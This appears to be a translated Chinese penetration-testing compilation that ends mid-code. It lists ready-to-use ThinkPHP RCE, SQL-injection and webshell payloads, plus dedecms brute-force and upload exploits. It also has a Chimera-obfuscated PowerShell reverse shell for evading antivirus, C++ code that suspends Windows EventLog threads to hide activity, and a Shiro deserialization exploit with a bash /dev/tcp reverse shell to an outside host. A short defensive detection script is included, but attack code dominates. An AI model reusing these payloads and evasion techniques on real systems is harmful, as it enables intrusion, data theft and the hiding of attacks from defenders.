order=id and(updatexml(1,concat(0x7e,(select user())),0))
The following is reprinted from 酒仙橋六號部隊.
TP5 database credentials exposed with debug on
In tp5.0.* with debug mode on, causing a database query error at a data-interaction point (SQL injection, empty parameters and so on) can in some cases print the database username and password directly. (The error report is very detailed and the credentials are easy to miss unless you read carefully.)
In debug mode, injection points can also be located from the error messages, and debug mode may turn an injection with no echo into an error-based one. That is especially useful when the target database cannot connect out.
Using the log files
The log files live under runtime/log, typically at paths like /runtime/log/2020001/01.log, and logging is on by default. There are three main uses.
1. HTTP requests. Log files commonly record HTTP requests; if the site has an admin login, the cookies recorded in those requests can be used to log into the back end.
2. Building SQL injections. Under some configurations the log also records executed SQL statements and their errors, which helps build an injection, though this is rarely used in practice: the data-interaction point has to be found first and matched against the assignments and errors recorded in the log.
3. Cache file names. Getting a webshell through cache files in tp is an old topic; it works in theory under white-box conditions, but in practice there are obstacles such as how the cache file gets generated and what it is named. The log may contain errors from cache file generation that reveal how the target's cache files are named. An example from one engagement, the target's tp log:
Because cache generation failed, the cache file name was printed straight into the log. The naming rule can then be guessed from the output: tp5 names cache files md5(value) by default, so most of the time candidate values can be hashed and compared against the file name. Here guessing and comparison showed the cache file name is generated from the absolute path of the view file.
Generating the md5 with php's native md5 function is the safest; an online tool was used here for convenience. That removes the main obstacle to the cache getshell. Afterwards, look as usual for an interaction point that writes into the database, such as posting or leaving a comment, and find a way to get the webshell from there.
tp5 routing
The official thinkphp documentation expects operators to set public as the web root, i.e. to use ./public/index.php as the entry file. In real engagements, since thinkphp is a framework with a lot of secondary development, some developers choose a custom entry file not placed under public, such as /var/www/html/index.php. That affects the route an exp has to use, because a custom entry file can change the path that gets invoked. As a rule, use ./public/index.php when firing an exp. Taking this exp as an example:
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
the variants you may encounter include:
http://xxx/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://xxx/index.php?s=\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
So an exp failing does not mean there is no hole; in black-box testing you may simply not have found the right route. A case from practice:
With the standard exp the response is "method does not exist", because the native routing was changed during secondary development; the final code-execution payload was:
5.0.* versus 5.1.*: 5.0 has more usable exps than 5.1; for 5.1 the main technique is the exp shown above. The problematic code in App.php:
In short, the backslash is accepted as part of a class name, so the class gets instantiated; the detailed analysis is not repeated here. The overall approach during a pentest is much the same: try several exps, try reading the log files, and tell the versions apart by comparing the directory layouts of the two when no other information is available. TP5:
          TP5.1:
If the site does not use /public/ as its root and no error message reveals the version, check whether directories exist, e.g. request ./thinkphp/. Do not rely on /app/ for this: many developers rename that directory (to /apps/, /applications/ and so on), which makes it impossible to tell 5.1 from 5.0 that way.
tp3 pentest approach
tp3 log files are used the same way; the directory is usually ./Application/Runtime/logs/xxx/xx_xx_xx.log, where xxx is the app name and the file name is year_month_day.log, e.g. Application\Runtime\Logs\Home\16_09_09.log.
SQL injection
tp3's SQL injection is a framework-level problem: if secondary development calls the model's find, delete or select methods, injection can occur. In white-box testing, as long as model.class.php is unpatched, finding a call site is enough to find an injection. A short analysis of the select method. Model.class.php:
The function accepts an options parameter. To reach the injection it has to get into _parseOptions, which means passing two checks: options must be an array and the primary key must not be an array.
Passing options['table'] or options['alias'] with options['where'] set to a string makes options get returned as-is; nothing is filtered along the way. Execution then enters ThinkPHP\Library\Think\Db\Driver.class.php and its select method.
The SQL statement is generated by parseSql at the end.
Following into parseWhere: once the if is bypassed, the returned SQL is plain string concatenation, which is where the injection comes from, and it goes straight into select for execution.
Black-box testing is similar: find a database interaction point and try injections.
Writing a shell via cache
The difficulty of writing a webshell through cache is determining the cache file name, usually md5(absolute path); as mentioned above, the log can sometimes reveal it. Content written into the cache file is commented out, so a %0d%0a line break is needed to escape the comment. The payload usually ends up as:
%0d%0aeval($_POST['cmd']);%0d%0a//
Find a parameter that influences the page and write the webshell through it; it reproduces locally, though it has not come up in practice.
Main tp3 approach
Few tp3 tricks are usable in practice, so against a tp3 target the main idea is to find the logs and look in them for an admin panel and the like; that is more reliable than the framework injection or writing a shell via cache. The tp3 log usage is the same as for tp5; the directory is usually ./Application/Runtime/logs/xxx/xx_xx_xx.log, with xxx the app name and the file name year_month_day.log, e.g. Application\Runtime\Logs\Home\16_09_09.log; the naming format may vary, but a few tries usually find it.
A new tp6 problem
The tp6 gadget chain, in which model.php's __destruct() calls another class's __toString(), has already been written up, but the poc in that write-up was redacted; here is a quick walk-through.
Setting the object's lazySave property to True enters the save method:
then updateData:
checkAllowFields calls the db method; the statements framed in the screenshot concatenate, so setting either of those two properties to an object triggers that object's __toString. From there the exploitation matches tp5.*.


The rest of the gadget chain is the same as in tp5.*, ending in code execution.
Next the poc is built; to test the chain the author hand-wrote an unserialize call.
The payload is then generated with Dido1960's poc code: https://github.com/Dido1960/thinkphp/blob/master/v6.0.x/poc/poc.php
This chain needs a controllable unserialize point; secondary development that calls unserialize may lead to code execution. It can also serve as a tp6 backdoor: once the server has been taken by other means, an unserialize call placed somewhere gives a deserialization backdoor.
All pocs
Thinkphp5 rce poc tools
https://github.com/wh1t3p1g/phpggc
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
thinkphp 5.0.22
1. http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2. http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3. http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4. http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5
5. http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
thinkphp 5.0.21
6. http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7. http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.1.*
8. http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9. http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10. http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11. http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12. http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13. http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14. http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15. http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
Unknown version
16. ?s=index/\think\module/action/param1/${@phpinfo()}
17. ?s=index/\think\Module/Action/Param/${@phpinfo()}
18. ?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19. index.php?s=/home/article/view_recent/name/1'
    header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20. index.php?s=/home/shopcart/getPricetotal/tag/1%27
21. index.php?s=/home/shopcart/getpriceNum/id/1%27
22. index.php?s=/home/user/cut/id/1%27
23. index.php?s=/home/service/index/id/1%27
24. index.php?s=/home/pay/chongzhi/orderid/1%27
25. index.php?s=/home/pay/index/orderid/1%27
26. index.php?s=/home/order/complete/id/1%27
27. index.php?s=/home/order/complete/id/1%27
28. index.php?s=/home/order/detail/id/1%27
29. index.php?s=/home/order/cancel/id/1%27
30. index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31. POST /index.php?s=/home/user/checkcode/ HTTP/1.1
    Content-Disposition: form-data; name="couponid"
    1')unionselect sleep('''+str(sleep_time)+''')#
thinkphp 5.0.23 (full version), debug mode
32. (post) public/index.php
    (data) _method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.0.23 (full version)
33. (post) public/index.php?s=captcha
    (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thinkphp 5.0.10 (full version)
34. (post) public/index.php?s=index/index/index
    (data) s=whoami&_method=__construct&method&filter[]=system
thinkphp 5.1.*, 5.2.* and 5.0.*
35. (post) public/index.php
    (data) c=exec&f=calc.exe&_method=filter
Thinkphp5 injection pocs (app_debug must be on)
http://yoursite/index/index/index?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1
http://localhost:8000/index/index/index?username[0]=point&username[1]=1&username[2]=updatexml(1,concat(0x7,user(),0x7e),1)^&username[3]=0
http://localhost:8000/index/index/index?username=)unionselect updatexml(1,concat(0x7,user(),0x7e),1)#
http://localhost:8000/index/index/index?username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)unionselect 1,user()#
http://localhost:8000/index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1
http://localhost:8000/index/index/index?options=id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23
Thinkphp5 file inclusion poc
5.0.0<=ThinkPHP5<=5.0.18, 5.1.0<=ThinkPHP<=5.1.10
Create the file application/index/view/index/index.html with arbitrary content (without this template file the program errors during rendering) and put the image webshell 1.jpg in the public directory (simulating an image upload). Then request http://localhost:8000/index/index/index?cacheFile=demo.php to trigger the file inclusion.
Thinkphp5 code execution pocs
5.0.0<=ThinkPHP5<=5.0.10
http://localhost/tpdemo/public/?username=mochazz123%0d%0a@eval($_GET[_]);//
http://localhost:8000/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
ThinkPHP <= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system
ThinkPHP <= 5.0.23, 5.1.0 <= 5.1.16 (the framework's app_debug must be on)
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
ThinkPHP <= 5.0.23 (needs an xxx method route to exist, e.g. captcha)
POST /?s=xxx HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
Write a shell into the log
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>&
Write a shell into the session
POST /?s=captcha HTTP/1.1
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1&
Include the session to getshell
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=tmp\sess_kking&server[]=1
Include the log to getshell
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();&
POST /?s=captcha
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8%2bab&server[]=1
(+ is URL-encoded as %2b; ab is added before and after to pad the decoding)
/?s=captcha&r=phpinfo();
_method=__construct&method=get&filter[]=think\__include_file&get[]=php://filter/read=convert.base64-decode/resource=c:\www\tmp\sess_kking&server[]=1&
POST /?s=captcha&r=phpinfo();
Cookie: PHPSESSID=kking
_method=__construct&method=get&filter[]=base64_decode&filter[]=think\__include_file&get[]=cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWM6XHd3d1x0bXBcc2Vzc19ra2luZw==&server[]=1&
Set the session
POST /?s=captcha
Cookie: PHPSESSID=kktest
_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1
File inclusion
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
Thinkphp6 arbitrary file creation
Needs a controllable session parameter, such as username
/index.php?username=<?php phpinfo();?>
Cookie: 1234567890123456789012345670.php
The cookie must be 32 characters long; the file sess_1234567890123456789012345670.php is then created under runtime\session

Downloading files with Windows Defender

          C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c
Other uses



PowerShell script obfuscation to bypass AMSI and AV

https://github.com/tokyoneon/Chimera
A fragment of Invoke-PowerShellTcp.ps1:
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
After processing with Chimera:
          # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.   # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.            
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued. 
VirusTotal report: 0 detections.

Installation on Kali:
```shell
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
```
The shells/ directory contains several Nishang scripts and a few generic scripts; all of them have been tested. Before using a script, change the hard-coded IP address (192.168.56.101) to your Kali address:
```shell
/opt/chimera$ sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1
```
The default port for all scripts is 4444; change it with sed again if needed:
```shell
/opt/chimera$ sed -i 's/4444/<YOUR-DESIRED-PORT>/g' shells/*.ps1
```
Options:
- -f: input file.
- -o: output file.
- -g: omit several Nishang-specific signatures from the script.
- -v: replace variable names.
- -t: replace data types.
- -j: replace function names.
- -i: insert arbitrary comments into every line.
- -c: replace comments with arbitrary data.
- -h: convert IP addresses to hexadecimal format.
- -s: replace various strings.
- -b: backtick strings where possible.
- -e: check the obfuscated file after processing.

Example: nc reverse shell. Listen with
```shell
nc -v -l -p 4444
```
Copy the obfuscated script to the target and run it:
```
PS> powershell.exe -ep bypass C:\path\to\chimera.ps1
```
The shell comes back:
```
nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\target>
```
Further usage notes: https://github.com/tokyoneon/Chimera/blob/master/USAGE.md

Disabling the Windows event log by suspending the EventLog service threads

The Windows event log is handled by the EventLog service, which is hosted in svchost.exe. Listing the svchost processes shows many of them:
From the screenshot above it is not obvious which process actually hosts the service, but checking the processes one by one in Process Hacker eventually finds the svchost.exe hosting EventLog, currently pid 2196.
The EventLog process ID can be obtained with the following command:
```powershell
Get-WmiObject -Class win32_service -Filter "name = 'eventlog'" | select -exp ProcessId
```
Looking at that svchost.exe's threads, we see:
Shown below: suspending the threads is indeed enough to stop the EventLog service from registering any new events. Without the suspension, changing a password registers a new event; with the threads suspended, no new event appears.

Code
At a high level the code below works as follows:
1. Open a handle to the Service Control Manager with OpenSCManagerA
2. Open a handle to the EventLog service with OpenServiceA
3. Retrieve the process ID of the svchost.exe that hosts EventLog with QueryServiceStatusEx
4. Open a handle to that svchost.exe process (from step 3)
5. Get the list of modules loaded by svchost.exe with EnumProcessModules
6. Loop through the modules retrieved in step 5, find wevtsvc.dll by name and take its base address; this is the module that contains the service's internals
7. Get the module information for wevtsvc.dll with GetModuleInformation; it returns the module's start address and size, which are needed later to decide whether a service thread falls inside the wevtsvc.dll memory range
8. Enumerate all threads inside svchost.exe with Thread32First / Thread32Next
9. For each thread from step 8, retrieve its start address with NtQueryInformationThread
10. For each thread from step 8, check whether its start address lies inside the wevtsvc.dll memory range within svchost.exe
11. If the start address lies inside wevtsvc.dll, this is a target thread: suspend it with SuspendThread
12. The EventLog service is now disabled
```cpp
#include <iostream>
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <dbghelp.h>
#include <winternl.h>
#pragma comment(lib, "DbgHelp")

// NtQueryInformationThread is not declared in the public headers, so it is resolved from ntdll at runtime
using myNtQueryInformationThread = NTSTATUS(NTAPI*)(IN HANDLE ThreadHandle, IN THREADINFOCLASS ThreadInformationClass, OUT PVOID ThreadInformation, IN ULONG ThreadInformationLength, OUT PULONG ReturnLength);

int main()
{
	HANDLE serviceProcessHandle;
	HANDLE snapshotHandle;
	HANDLE threadHandle;
	HMODULE modules[256] = {};
	SIZE_T modulesSize = sizeof(modules);
	DWORD modulesSizeNeeded = 0;
	DWORD moduleNameSize = 0;
	SIZE_T modulesCount = 0;
	WCHAR remoteModuleName[128] = {};
	HMODULE serviceModule = NULL;
	MODULEINFO serviceModuleInfo = {};
	DWORD_PTR threadStartAddress = 0;
	DWORD bytesNeeded = 0;
	myNtQueryInformationThread NtQueryInformationThread = (myNtQueryInformationThread)(GetProcAddress(GetModuleHandleA("ntdll"), "NtQueryInformationThread"));
	THREADENTRY32 threadEntry;
	threadEntry.dwSize = sizeof(THREADENTRY32);
	SC_HANDLE sc = OpenSCManagerA(".", NULL, MAXIMUM_ALLOWED);
	SC_HANDLE service = OpenServiceA(sc, "EventLog", MAXIMUM_ALLOWED);
	SERVICE_STATUS_PROCESS serviceStatusProcess = {};

	// Get PID of svchost.exe that hosts EventLog service
	QueryServiceStatusEx(service, SC_STATUS_PROCESS_INFO, (LPBYTE)&serviceStatusProcess, sizeof(serviceStatusProcess), &bytesNeeded);
	DWORD servicePID = serviceStatusProcess.dwProcessId;

	// Open handle to the svchost.exe
	serviceProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, servicePID);
	snapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);

	// Get a list of modules loaded by svchost.exe
	EnumProcessModules(serviceProcessHandle, modules, modulesSize, &modulesSizeNeeded);
	modulesCount = modulesSizeNeeded / sizeof(HMODULE);

	for (size_t i = 0; i < modulesCount; i++)
	{
		serviceModule = modules[i];
		// Get loaded module's name (the size argument of the wide-char version is in characters)
		GetModuleBaseName(serviceProcessHandle, serviceModule, remoteModuleName, _countof(remoteModuleName));
		if (wcscmp(remoteModuleName, L"wevtsvc.dll") == 0)
		{
			printf("Windows EventLog module %S at %p\n\n", remoteModuleName, serviceModule);
			GetModuleInformation(serviceProcessHandle, serviceModule, &serviceModuleInfo, sizeof(MODULEINFO));
		}
	}

	// Enumerate threads
	Thread32First(snapshotHandle, &threadEntry);
	while (Thread32Next(snapshotHandle, &threadEntry))
	{
		if (threadEntry.th32OwnerProcessID == servicePID)
		{
			threadHandle = OpenThread(MAXIMUM_ALLOWED, FALSE, threadEntry.th32ThreadID);
			// 0x9 = ThreadQuerySetWin32StartAddress
			NtQueryInformationThread(threadHandle, (THREADINFOCLASS)0x9, &threadStartAddress, sizeof(DWORD_PTR), NULL);

			// Check if thread's start address is inside wevtsvc.dll memory range
			if (threadStartAddress >= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll && threadStartAddress <= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll + serviceModuleInfo.SizeOfImage)
			{
				printf("Suspending EventLog thread %d with start address %p\n", threadEntry.th32ThreadID, threadStartAddress);
				// Suspend EventLog service thread
				SuspendThread(threadHandle);
				Sleep(2000);
			}
		}
	}
	return 0;
}
```
Demonstration: running net user ola ola changes user ola's password, and event 4724 is recorded at 6:55:30 PM


After running the binary, 4 EventLog threads inside svchost.exe are suspended


Run the password change command again


No new event is written; only the events from before the suspension remain
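As the defender's counterpart to the technique above, here is an added PowerShell check (not part of the original post or the C++ code) that lists the threads of the EventLog svchost.exe whose start address lies inside wevtsvc.dll and flags any sitting in the Suspended wait state. It assumes an elevated 64-bit PowerShell session on the host being examined.

```powershell
# Added example (not from the original post or the code above): report the state of
# the EventLog service threads. The technique suspends threads whose start address
# lies inside wevtsvc.dll, so a wevtsvc thread in the Suspended wait state is the
# artefact to hunt for. Run from an elevated 64-bit PowerShell so that the module
# list of the 64-bit svchost.exe can be read.
function Get-EventLogServiceThreads {
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name = 'EventLog'"
    if (-not $svc -or -not $svc.ProcessId) { throw 'EventLog service is not running' }

    $proc = Get-Process -Id $svc.ProcessId
    $mod  = $proc.Modules | Where-Object { $_.ModuleName -ieq 'wevtsvc.dll' }
    if (-not $mod) { throw "wevtsvc.dll is not mapped in PID $($svc.ProcessId)" }

    # Address range [base, base + size) of the module that implements the service
    $base = $mod.BaseAddress.ToInt64()
    $end  = $base + $mod.ModuleMemorySize

    foreach ($t in $proc.Threads) {
        $start = $t.StartAddress.ToInt64()
        if ($start -lt $base -or $start -ge $end) { continue }
        # WaitReason may only be read while the thread is in the Wait state
        $reason = if ($t.ThreadState -eq 'Wait') { $t.WaitReason } else { $null }
        [pscustomobject]@{
            ThreadId     = $t.Id
            StartAddress = ('0x{0:X}' -f $start)
            State        = $t.ThreadState
            WaitReason   = $reason
            Suspended    = ($reason -eq 'Suspended')
        }
    }
}

$threads = Get-EventLogServiceThreads
$threads | Format-Table -AutoSize
if ($threads | Where-Object Suspended) {
    Write-Warning 'EventLog service threads are suspended: new events are not being recorded'
}
```

On a healthy host every wevtsvc thread reports a wait reason such as UserRequest or ExecutionDelay; after the technique above has run, the affected threads show Suspended and the warning fires.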

dedecms

Brute-forcing the admin directory

Windows server: tags.php
```python
import requests
import itertools

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.test.com/tags.php"
data = {
    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]" : 0,
    "_FILES[mochazz][size]" : 0,
    "_FILES[mochazz][type]" : "image/gif"
}

for num in range(1,7):
    if flag:
        break
    for pre in itertools.permutations(characters,num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        r = requests.post(url,data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("[+] 前綴為:",back_dir)
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("后臺地址為:",back_dir)
```
rss.php
```python
import requests
import sys

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
menu = ''
for k in range(10):
    for payload in payloads:
        data = "dopost=save&_FILES[b4dboy][tmp_name]=../%s%s</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif" % (menu, payload)
        res = requests.post("http://www.yx-tv.com/plus/rss.php", data=data, headers={"Content-Type":"application/x-www-form-urlencoded"})
        if res.content.decode("utf-8").find("Error") > -1:
            menu += payload
            break
        if payload == '-':
            print(menu)
            sys.exit()
print(menu)
```

dedecms front-end reset of any administrator password

https://xz.aliyun.com/t/1959

Forging a cookie to log in as any front-end user

Register a user user1, visit /member/index.php?uid=user1 and log in as user1. Assign the value of last_vid to DedeUserID and the value of last_vidckMd5 to DedeUserIDckMd5. The modified cookie:

Front-end shell upload

Log in as Admin, publish an article and rename the file to 1.jpg.p*hp.
Admin file upload: visit /dede/tpl.php?action=upload, get the token from the browser developer tools (F12), then visit
/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[token value]
i.e. /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=6d0c1893e01a77e7e6ba24fb2dc7599c
Shell location: /include/taglib/moonsec.lib.php

Admin getshell

Modules -> Ad management -> New ad; put a one-line shell in the ad content, then request /plus/ad_js.php?aid=[x]

FastAdmin front-end getshell

Create a user on the front end, change the avatar and upload an image webshell, then request /public/index/user/_empty?name=../../public/uploads/20200926/4a91d432904c0042bcd038ea96ad4947.jpg

Shiro rememberMe deserialization vulnerability

Shiro material reposted from the bypass WeChat account.
https://github.com/insightglacier/Shiro_exploit
```shell
python shiro_exploit.py -u http://192.168.172.129:8080
```
With the recovered key, the two common exploitation methods are a reverse shell and a file write.

Reverse shell
Listen on a local port:
```shell
nc -lvp 1234
```
Java Runtime with bash encoding (online encoder: http://www.jackson-t.ca/runtime-exec-payloads.html). Encoding bash -i >& /dev/tcp/192.168.172.133/1234 0>&1 gives:
```shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}
```
Use the JRMP listener module of ysoserial, listening on port 6666 and executing the reverse shell command:
```shell
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'
```
Generate the payload with shiro.py:
```shell
python shiro.py 192.168.172.133:6666
```
shiro.py is as follows:
```python
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))
```
Construct the request, forge the cookie and send the payload.

File write
Generate the poc.ser file:
```shell
sudo java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser
```
Encrypt the payload with Shiro's built-in default key:
```java
package shiro;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TestRemember {
    public static void main(String[] args) throws Exception {
